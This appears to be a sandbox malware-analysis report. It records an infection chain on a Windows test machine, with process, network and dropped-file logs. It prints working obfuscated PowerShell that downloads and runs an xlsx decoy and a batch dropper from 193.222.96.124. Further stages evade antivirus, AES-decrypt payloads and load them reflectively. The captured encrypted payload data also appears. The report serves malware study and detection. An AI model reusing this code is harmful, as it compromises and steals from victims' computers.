Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | May 9, 2024, 11 a.m. | May 9, 2024, 11:03 a.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function bbxgiw($ZAcSVGmUSb, $IBxvpBHeyGkPf){[IO.File]::WriteAllBytes($ZAcSVGmUSb, $IBxvpBHeyGkPf)};function ojlXybZLvZhi($ZAcSVGmUSb){if($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51014,51022,51022))) -eq $True){rundll32.exe $ZAcSVGmUSb }elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51026,51029,50963))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ZAcSVGmUSb}elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51023,51029,51019))) -eq $True){misexec /qn /i $ZAcSVGmUSb}else{Start-Process $ZAcSVGmUSb}};function ZTShcLKVojjjn($ttPNcPNxWlHASCPq){$otBKtBGsNwWYWr = New-Object (sfWXxnhzozpkMF @(50992,51015,51030,50960,51001,51015,51012,50981,51022,51019,51015,51024,51030));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$IBxvpBHeyGkPf = $otBKtBGsNwWYWr.DownloadData($ttPNcPNxWlHASCPq);return $IBxvpBHeyGkPf};function sfWXxnhzozpkMF($nnOzoG){$ZlNUzHDh=50914;$LhJJuezpiYtrmWA=$Null;foreach($ftpbeyTmSNIRDf in $nnOzoG){$LhJJuezpiYtrmWA+=[char]($ftpbeyTmSNIRDf-$ZlNUzHDh)};return $LhJJuezpiYtrmWA};function gKmyZggnNdrsx(){$FpFxTClibKgYisv = $env:AppData + '\';$XBjwOTFpNLUOLiDA = $FpFxTClibKgYisv + '222.xlsx';If(Test-Path -Path $XBjwOTFpNLUOLiDA){Invoke-Item $XBjwOTFpNLUOLiDA;}Else{ $hdzdewyeMxNBT = ZTShcLKVojjjn (sfWXxnhzozpkMF @(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,50964,50964,50964,50960,51034,51022,51029,51034));bbxgiw $XBjwOTFpNLUOLiDA $hdzdewyeMxNBT;Invoke-Item $XBjwOTFpNLUOLiDA;};$hfUJdR = $FpFxTClibKgYisv + 'xD.bat'; if (Test-Path -Path $hfUJdR){ojlXybZLvZhi $hfUJdR;}Else{ $xCTSEEhGQY = ZTShcLKVojjjn (sfWXxnhzozpkMF @(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,51034,50982,50960,51012,51011,51030));bbxgiw $hfUJdR $xCTSEEhGQY;ojlXybZLvZhi $hfUJdR;};;;;}gKmyZggnNdrsx;
2176-
EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" /dde
2332 -
-
-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "
2800 -
powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2864
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1236
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
193.222.96.124 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 193.222.96.124:7287 -> 192.168.56.103:49164 | 2400036 | ET DROP Spamhaus DROP Listed Traffic Inbound group 37 | Misc Attack |
TCP 192.168.56.103:49164 -> 193.222.96.124:7287 | 2027254 | ET INFO Dotted Quad Host XLSX Request | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\15.0\Registration\{91150000-0011-0000-0000-0000000FF1CE}\DigitalProductID |
file | C:\Users\test22\AppData\Roaming\222.xlsx |
file | C:\Users\test22\AppData\Roaming\~$222.xlsx |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\222.xlsx.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\222.xlsx.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk |
file | C:\Users\test22\AppData\Roaming\xD.bat |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\222.xlsx.lnk |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\222.xlsx.LNK |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function bbxgiw($ZAcSVGmUSb, $IBxvpBHeyGkPf){[IO.File]::WriteAllBytes($ZAcSVGmUSb, $IBxvpBHeyGkPf)};function ojlXybZLvZhi($ZAcSVGmUSb){if($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51014,51022,51022))) -eq $True){rundll32.exe $ZAcSVGmUSb }elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51026,51029,50963))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ZAcSVGmUSb}elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51023,51029,51019))) -eq $True){misexec /qn /i $ZAcSVGmUSb}else{Start-Process $ZAcSVGmUSb}};function ZTShcLKVojjjn($ttPNcPNxWlHASCPq){$otBKtBGsNwWYWr = New-Object (sfWXxnhzozpkMF @(50992,51015,51030,50960,51001,51015,51012,50981,51022,51019,51015,51024,51030));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$IBxvpBHeyGkPf = $otBKtBGsNwWYWr.DownloadData($ttPNcPNxWlHASCPq);return $IBxvpBHeyGkPf};function sfWXxnhzozpkMF($nnOzoG){$ZlNUzHDh=50914;$LhJJuezpiYtrmWA=$Null;foreach($ftpbeyTmSNIRDf in $nnOzoG){$LhJJuezpiYtrmWA+=[char]($ftpbeyTmSNIRDf-$ZlNUzHDh)};return $LhJJuezpiYtrmWA};function gKmyZggnNdrsx(){$FpFxTClibKgYisv = $env:AppData + '\';$XBjwOTFpNLUOLiDA = $FpFxTClibKgYisv + '222.xlsx';If(Test-Path -Path $XBjwOTFpNLUOLiDA){Invoke-Item $XBjwOTFpNLUOLiDA;}Else{ $hdzdewyeMxNBT = ZTShcLKVojjjn (sfWXxnhzozpkMF @(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,50964,50964,50964,50960,51034,51022,51029,51034));bbxgiw $XBjwOTFpNLUOLiDA $hdzdewyeMxNBT;Invoke-Item $XBjwOTFpNLUOLiDA;};$hfUJdR = $FpFxTClibKgYisv + 'xD.bat'; if (Test-Path -Path $hfUJdR){ojlXybZLvZhi $hfUJdR;}Else{ $xCTSEEhGQY = ZTShcLKVojjjn (sfWXxnhzozpkMF @(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,51034,50982,50960,51012,51011,51030));bbxgiw $hfUJdR $xCTSEEhGQY;ojlXybZLvZhi $hfUJdR;};;;;}gKmyZggnNdrsx; |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); " |
cmdline | C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function bbxgiw($ZAcSVGmUSb, $IBxvpBHeyGkPf){[IO.File]::WriteAllBytes($ZAcSVGmUSb, $IBxvpBHeyGkPf)};function ojlXybZLvZhi($ZAcSVGmUSb){if($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51014,51022,51022))) -eq $True){rundll32.exe $ZAcSVGmUSb }elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51026,51029,50963))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ZAcSVGmUSb}elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51023,51029,51019))) -eq $True){misexec /qn /i $ZAcSVGmUSb}else{Start-Process $ZAcSVGmUSb}};function ZTShcLKVojjjn($ttPNcPNxWlHASCPq){$otBKtBGsNwWYWr = New-Object (sfWXxnhzozpkMF @(50992,51015,51030,50960,51001,51015,51012,50981,51022,51019,51015,51024,51030));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$IBxvpBHeyGkPf = $otBKtBGsNwWYWr.DownloadData($ttPNcPNxWlHASCPq);return $IBxvpBHeyGkPf};function sfWXxnhzozpkMF($nnOzoG){$ZlNUzHDh=50914;$LhJJuezpiYtrmWA=$Null;foreach($ftpbeyTmSNIRDf in $nnOzoG){$LhJJuezpiYtrmWA+=[char]($ftpbeyTmSNIRDf-$ZlNUzHDh)};return $LhJJuezpiYtrmWA};function gKmyZggnNdrsx(){$FpFxTClibKgYisv = $env:AppData + '\';$XBjwOTFpNLUOLiDA = $FpFxTClibKgYisv + '222.xlsx';If(Test-Path -Path $XBjwOTFpNLUOLiDA){Invoke-Item $XBjwOTFpNLUOLiDA;}Else{ $hdzdewyeMxNBT = ZTShcLKVojjjn (sfWXxnhzozpkMF @(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,50964,50964,50964,50960,51034,51022,51029,51034));bbxgiw $XBjwOTFpNLUOLiDA $hdzdewyeMxNBT;Invoke-Item $XBjwOTFpNLUOLiDA;};$hfUJdR = $FpFxTClibKgYisv + 'xD.bat'; if (Test-Path -Path $hfUJdR){ojlXybZLvZhi $hfUJdR;}Else{ $xCTSEEhGQY = ZTShcLKVojjjn (sfWXxnhzozpkMF @(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,51034,50982,50960,51012,51011,51030));bbxgiw $hfUJdR $xCTSEEhGQY;ojlXybZLvZhi $hfUJdR;};;;;}gKmyZggnNdrsx; |
cmdline | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Data received | HTTP/1.1 200 OK |
Data received | Content-Length: 9715 Content-Type: application/octet-stream Connection:close PK ! bîh^ [Content_Types].xml ¢( ¬ËNÃ0E÷HüCä-Jܲ@5íÇ*Q>ÀÄƪc[iiÿûB¡j7±ÏÜ{2ñÍh²nm¶Æ»RÈÀU^7/ÅÇì%¿rZYï @1__f q·ÃR4DáAJ¬h>ãÚÇVßƹªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I"{Üv^¥P!XS)bR¹rúK¾s(¸3Õ`cÞ0½ÝÎß»¾7M4²©ôªZÆk+¿|\|z¿(ôPúº6h_-[@!ÒØ Pk´2nÏ}Ä?£LËð Ýû%áÄßdºdN"m,à¥ÇDO97*~§Èɸ8ÀOíc|n¦ÑäEøÿöéºóÀBÉÀ!$}íàÈé;{ìÐå[îñé2þ ÿÿ PK ! µU0#ô L _rels/.rels ¢( ¬MOÃ0ïHüÈ÷ÕÝBKwAH»!T~Iܵ£$Ý¿'TG½~üÊÛÝ<êÈ!öâ4¬;#¶wúqu*&rFq¬áÄvÕõÕöGJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥=ZÆMYÞbø®ÕBSí°·7 êÏצé ?9LìÒÈsbgÙ®|Èl!õùUSh9i°br:"y_dlÀóD¿ý|-NÈR"4ø2ÏGÇ% õZ´4ñËyÄ7 ëÈðÉ¨Þ ÿÿ PK ! âû Ñ xl/workbook.xml¬UÛn£0}_iÿù¹% T©»ªz}´rÀ V ³¶iRUý÷^òÒm/9>3s<m«Òx B2^ÇØÈ uÆsV¯bt{sn!©sRòÆèJt6úþítÃÅzÁùÚ ZƨPª,Kf<á Á²ä¢" ¦beÉFPËRUcÛUV£B$>ÁKÑ ÏÚÖj"hIÐkdVe«X·ñª+zì@QeÑlUsA%¸½Å¾±pð`§ß LG[U,\ò¥:hkGúÈl[¿ Áö8Cò,AÎá>É*8`/`Øþ2iuZ |
Data received | Content-Length: 66709 Content-Type: application/octet-stream Connection:close @echo off set "XYwABq=setocjVd ocjVduocjVdnSiocjVd=1 ocjVd&ocjVd& ocjVdstocjVdarocjVdt "ocjVd"ocjVd /mocjVdinocjVd ocjVd" set "aHbyse=&& ocjVdeocjVdxiocjVdtocjVd" set "YnfQeG=noocjVdtocjVd deocjVdfiocjVdnocjVdedocjVd uocjVdnSocjVdiocjVd if %YnfQeG:ocjVd=% (%XYwABq:ocjVd=%%0 %aHbyse:ocjVd=%) ::BeF5ow87uxWaOVsDX34hfHMzjY9LyYGJF8taUicqnOUHe1k+/C8bjfy7DRK1pgkPdtgP565bb9l1s/5bJA7EJV5U6XEOWyzY6nThjd5rAl67iErFaOrBOKOOvdUPLJj8yPws2zLhtzEujD588yBkMTMx9HC7KYAklXvPVSNdG4Ol54BuJusY/AB0kfUsR+J3koGkeRUT1m/s1AGQOaLusuZeFaFfqfOgHpgq7TWGba/B0JufgZ8a03iTDlDWnrdqh2GKb57hz7eEfEly+VXCXMdddlc9J45dLdABoTiyQ7tfKj+LXWZC52OxM+5SHVic+xXDN5nAoZvbK/WoU7y7u8SoviIS/X96YgW7R51EmhMNDPybjPit63dj4eQKo7jvhETMkWsBhp2sx6y5PKShUekyFY3WrjwAYffrkA1ZKo4qhj9rOXtHrlTCj7j+iU4uG3zFw44eGfmGvCOqUOe+iJYfFfouIEKHMg1ixaf87l4kXIlLMjjXoNn/0XJ/Tvt/eC77/MjMi9SAUg9Uvch+74mglxEvZU9GiucPSPzDflPSEhSVYj+OjkUob54YgRgL8HhhRHRlikAAyyPxSeJ18Md/asnK53hPVc49qolIY83tG3Fa2wXtEDSIitt8RQF2lWZj9HImAs0tVqmA9z+qMnbKbXy3WpYrVALWMakVYEiW7OwjVuO0Kqb7nqAtFR1MZfgeSVRWKzD5beSDoeJNUhVzs1eGAdJljUSuQnuWucaWBd9uoJcaLnGgfV0X4N9WQPwYjGd4naPDIIBYVcBweC0CoK10uOtSFiJzSqbEISWOAualyz/A6eGRHKkxaKl5F83Kp+Qillri9trdzPAGb/1ZNd54J4hbx7QR7tsfmN90wm+BevEvIzZkbF9ipwoMjAU0/BuB4PbSNely5xw5HFyyacehUXMDrtUAbDDjiwobB6dXeIO+eq1Rm6GfDNrjPcBRjphgjtQ2Qsvs1VG/3BDMIYSV4/H74I9rnWNkqo6QwwUh8bHzllBe4jhdKjthpI/OVi56Z8shqld6zR5Wt4eOYbm5I5DgS9IpwixY1Br1hQ4gyTRaYz6HDm1eo4sltb+EE9RGy2N/FfPPL7ysZD806HIwu7+uUkUUpZ5tJwAff1jVoGtkODQVN+QILsb3juCRaDB+TFoEHsJnEU8ITH19TURHoVvTOjLLn5xOhcU2etBUHlsHZ2klEydvXgRWL8yON4Oqz1CQdT+HirAYGaXn5fnWgNU09dXarADPEUOxcDVIuGWMg2p0/wgf+ANkBwdr0gCLjdlYUDpIUagoSl1jhs7FadaSS3QCJlPh4CDOePaN2gRMGEIUg3JBLnQcwSDfof61zglFwhS9jTs0fkiYuFDFEjL0dgCWNGNQG1yKdGXEEJ61RU3kqgiliOx6WjzbDggnVhbn+R4d0uExP990QRPusO5LR6Ev8aCyBSA/MjCuNayqaI843sPM52AEfQcDpmW3mlIO1A4ntSRwqL3sV7GRvd7DocYOUqDSxan9neGhuCtgrMuOus2VoqvRU7d0xyfqo5bs4SIW7qksuPW5DgQUJXm1bRTmn/kHDzJ0/4hWYV28Skzo8qT4wQcayI7I9iGl0jjYFrGiCgPQdMZx23/0Sesm4HQSpaIGOlUKBzR0/uP3jrPu0JlxkEZDairsQxmeFmpFOMx5j/vrwNgrL74iaFGGkynwqD2M2ivdpiR7Z8BgoKz8trnfXTo3H1IUB9KfnHjxFVN2CFHq/ |
Data received | 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 |
Data received | fPihmiy3z3Jmz3gRwyq0JHIixytR3HIasIxTDtfxl3jBIxS035B97hwo6qUbJ4xeLA7rCDpPB9zo9+tI+3VKwVempjfBrbzIMAqqooSMrSb7Qh/cjj+WHANfOcN456sCRgoNUEQpen35a8Y1ZSIdjmdE07UQ6hIWskMUMLQXkMqMZkae8Jx2MA/2c96HTgn7qv8oKEkPNOgnyk9/TftrAX4dNucPBpmcz/iqLJia4+CLHoj1hmYvJilk0dEjc9Y/JWnlgl3wCF+KZVw6KGdNlMkGxFZ1ZRtkuwEqZrNxu6e3cLamM6KVQOUfrADYG3ZV2L7LY2Wjan1jxgwil/s1L7qBnsOWUJSXqfJg+r900dFJ2ni8+suEl8kkWLTWxiHZQx3YhloFVdjYd1rCGrl/oDU/ynA6ht6Z0Ak5VYUxLIb2rZldpse0Bacl1lhwqq/UbK5Mhm+AtbflpcFNAW+gjAyc5lIltE+IV0FR/ZtmBbmHLCHCcnMMCXng/ItxA55jOH9Ewxckf9BmAHGvNYARc3d5j70DQMpE77CmjWRYjcWL7Ux203iMDEGacte+ukj3WDIHsPxAcipFIRISHO+0110ZEVCaYFsT/Oj+w+c+Rtt+2ZwIrAu1D7wi+ZTEwBMRxARFg4sL4kzLLGHKLUNwJoSpeoTtK+PVwwel4FOE26jNYQkF5QcHi0RgKG7floIpVvnMTf16v7D/CN1UQRpIqLPOoksZUbpGP0afL8XrDG+YqXW5ZGVmPA1IamFoYLcuZTroUA3BhEJMCrWiTo0GwH0rZMPRpqFQW5U1O7uoIodtf6rahjqnKHHNlgaOixWf1oR+cXMhkaklAPBEFfYKpk6yBuEU0ZMAKkEyGxU7JS1lGu+cc1PJ4dCGY7rXTmDByLGeas1VMCp1HGD1KBemrIwRiYyeiuE7k6sHUkD3RBLqhHBnBDI/GQfjh4/CeSnfg+mprJdmwTMOclFpeD4CP7PqxMB4Ydqv86cIFphasjRhsotfR/NO4tSZiX8D5OeK7dh7FjuoBFgKE8jIqRtReYhVQ+OckXZbZqq1prQ2OkSFlqiwHBbH77xtyZrIAknZwgZYZ4dudA8/il57IjlRcojw+n+4DvD1TEDL3t48uAj95fUJu7xNFNg3SfoG2dyjm/3m9zNbNtWSOgDWCJSqcj7QpJPLUTFtjNsQNjL6MpcTmxwU4I8EZliYaAlJOov3JvCbA3zMy8OvPKHlhaxX1FBk10gRZqSy+MoDNQ9u4FKSAYpnrDqxeavJo2ZNNaFLjhMThmL0MtvNYl4HvSxrr/gD9guWSrukTOI8WqT98WwKQR7Vv62Fv5Vq/ACATYX9i+9cQRg2AYZzROc56SYlKNDY/RX2siWLKwFtNk7Hzt9v1mF8Klu8a0d5MGQLOlaKaUtqox6Bo7SaAb7PnuWxstXtr5smc1Lo2Rv57dCsd0EVSe8iWbfSbuEPzFmZxVbOHFkWVv0HOlkdosJHHaLZ3vTG25KXU+AXQqHjcFeEvcbEawlHuPO9zbUNIfBn5vfx0TGef6ZnlKKIQoQMZtI3yzgvg6kYAZB1NIyfF8g4aw1cyMeCP4WGEPdOVRYSLg5tVwyuZu5w0f4KODKqhEIQ4ss1jGjNBfclvooLTjKuEPzwhfTEu5JtfjbeufllUxM9Jjlv+n5z18rig6xwjYT0oWwm1szPdu5a3bCUXzZ5qIOTSCIbOI5zpt008V7AHEEDhNqaSjwjKFKKDIRNVatBs+Q/l0EOeZhokTwkKPUJ49ov